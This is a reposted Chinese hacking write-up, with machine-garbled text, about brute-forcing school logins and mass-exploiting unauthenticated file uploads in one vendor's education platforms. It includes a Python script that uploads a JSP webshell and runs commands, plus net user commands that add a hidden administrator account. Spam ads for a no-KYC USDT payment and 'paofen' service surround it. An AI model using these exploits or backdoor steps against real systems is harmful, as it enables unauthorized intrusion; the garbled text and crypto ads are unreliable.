泰州新闻

usdt第三方支付(www.caibao.it):一次从内网到外网,黑盒到白盒的批量挖洞履历

来源:泰州新闻网 发布时间:2021-03-30 浏览次数:

USDT自动充值API接口

菜宝钱包(caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

前言:此次挖洞较为基础,剖析得不足的地方望大佬指正。
内网挖洞
建议像我这样入门不久的可以拿自己学校内网练练手先(得授权),再在在教育行业SRC等破绽平台上挖掘破绽,赢得认可,获取些动力。<大佬的当我没说 0.0>
向信息中央的先生申请了对学校举行内网渗透测试的授权之后,便最先信息网络(亮神说的:渗透的本质是信息网络)。
由于在事情室辅助运维也知道服务器多在10.x.x.0/24这网段,这里我用Goby对该网段网络存活ip和端口。(由于真实ip可以绕过waf以是可以铺开扫,固然其它大学就纷歧定了)

内网一堆破绽emm,然后就可以用大佬的webalivescan批量扫一下Goby得的存活ip,获取题目,web指纹识别和简朴的爆破一些目录
工具地址:https://github.com/broken5/WebAliveScan
然后先挑带登录题目的,目录扫描到登录的或敏感目录的软柿子开干,发现xx教学平台

没有验证码爆破,固然有的有验证码也可能虚的,凭证自己学号推测 ,
例如 2018xx 一样平常是凭证 入校年数 专业 班级 xx来设定的,爆破后4位获得弱口令:
2018xx 123456
然后通例的:xxx-->控制面版-->上传头像-->Getshell。
固然许多jsp马都没兼容,试了挺多这大佬的jsp马才乐成
地址:https://github.com/threedr3am/JSP-Webshells

直接administrator权限,提权都省了
外网批量:
上面图有:手艺支持:xx公司
FOFA搜索要害词:xxx有限公司

然后挑一个站,爆破,xx学校,学号通过谷歌语法来搜集。
若是网络不到,大多学校学号是如下纪律:
2001 0077 入学的时间 报到位次
2018 031 01 05 入校年数 专业 班级 xx
2018 1 17 001 入学年 1本科学生 17xx招生专业代号,001这专业第一个学生。
爆破失败,才名顿开,可能未授权文件上传呢。
于是在burp将HOST地址改成目的的地址,发送数据包


一发入魂,乐成上传图片,改jsp也没问题,欧克妥妥的未授权文件上传!
该网站Getshell后实验3389登录:
net user mstlab mstlab /add : 添加用户并设置密码
net localgroup administrators mstlab /add : 将用户加入治理组
登录后在其桌面翻到敏感信息:测试账号和默认密码

同时这只是该公司的一个系统,又扩展到其它系统:(也大多乐成上传)

但有些系统照样不行,于是用测试账号登录发现这些系统的第二处未授权文件上传,很老的FCKedito,可运行哥斯拉马

至此该公司的系统基本通杀

Exploit编写
固然少量写个html文件上传就ok了,这里较多站就写个一键返回shell剧本。下面的已脱敏

import requests
, 读取webshell文件,
file = open('shell.txt', 'r',encoding='utf-8')
shell = file.read()
,shell=""" <%  out.println("just4test! "); %>  """
headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0"}
cookies={"JSESSIONID":"4F0ADEADB70AD18922C8C436837A5A3D", }
, 输入目的
url = input("input the TARGET(example:[url]https://127.0.0.1:1080[/url])>")
, 界说上传目录
upload_url = url "/xxx?action=xx"
,file参数files = {'file1': ('1.png', open('logo.png', 'rb'), 'image/png')}
files = {'file': ("shell.jsp", shell, "image/png")}
, 参见post内容
upload_data = {"start": "forum_update_set", "forum_update_set": "updatacord", "forum_nick": "11", "forum_signature": " ", "forum_pic_2": " ", }
, 上传
upload_res = requests.post(upload_url, headers=headers,cookies=cookies, data=upload_data, files=files)
, 此时会返回上传文件的路径
path = upload_res.text
, 剖析返回值获取上传地址
path = path[path.find('data') 4:path.rfind('jsp') ]
, 再连系路径
shell_url = url "/dta" path "jsp?cmd=whoami"
, 返回效果,默认是system权限
print('shell is here:' shell_url)

白盒审计:
最近恰好入门了java web开发,虽然Getshell了,但也得领会破绽原理吧。于是就打包源码,代码审计一下,看一下破绽原理
源码一样平常在Tomcat 的 webapps 目录或者
Tomcat 下的 conf 目录Catalinalocalhost 下的设置文件
有自界说源码工程路径:如abc.xml内容:

,

Usdt第三方支付接口

菜宝钱包(www.caibao.it)是使用TRC-20协议的Usdt第三方支付平台,Usdt收款平台、Usdt自动充提平台、usdt跑分平台。免费提供入金通道、Usdt钱包支付接口、Usdt自动充值接口、Usdt无需实名寄售回收。菜宝Usdt钱包一键生成Usdt钱包、一键调用API接口、一键无实名出售Usdt。

,
<!-- 
Context 示意一个工程上下文 ,path 示意工程的接见路径:/abc ,
docBase 示意你的工程目录在那里 
--> 
<Context path="/abc" docBase="E:book" ></Context>

接见这个工程的路径如下:http://ip:port/abc/ 就示意接见 E:book 目录
然后我在Tomcat 的 webapps 找到源码并用哥斯拉的打包

第一个文件上传:
首先查看web.xml,看看全局的设置以及路由,先看filter过滤,可以看到filter类QDKFilte的位置

但我们的源码没有对应的java文件或者类,便看java依赖有对应的java包xxx.jar
反编译用IDEA的插件“Java Bytecode Decompiler”,插件安装使用可自行百度

反编译乐成后获得对应xx.jar,注主要解压天生的jar包,即可获得java源码
然后filter类QDKFilte代码经由混淆,太烦杂,太多了并没找到session若何验证。。。。大佬请勿喷0.0我是菜鸡!!!

然后文件上传破绽web.xml可以看到文件上传的类

var13从全局函数获取转达的参数和值

然后getFileExtendName(var13)直接获取后缀名并直接拼接起来,然后确立文件

跟进getFileExtendName()是直接获取后缀的

第二个文件上传破绽的上传路径是
http:/ip:8080/xxx/FCKeditor/editor/xxx/jsp/upload.jsp

找到对应的文件:
和上面的类似用getFileExtendName()直接获取后缀的然后拼接没白黑名单

发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 验证码:点击我更换图片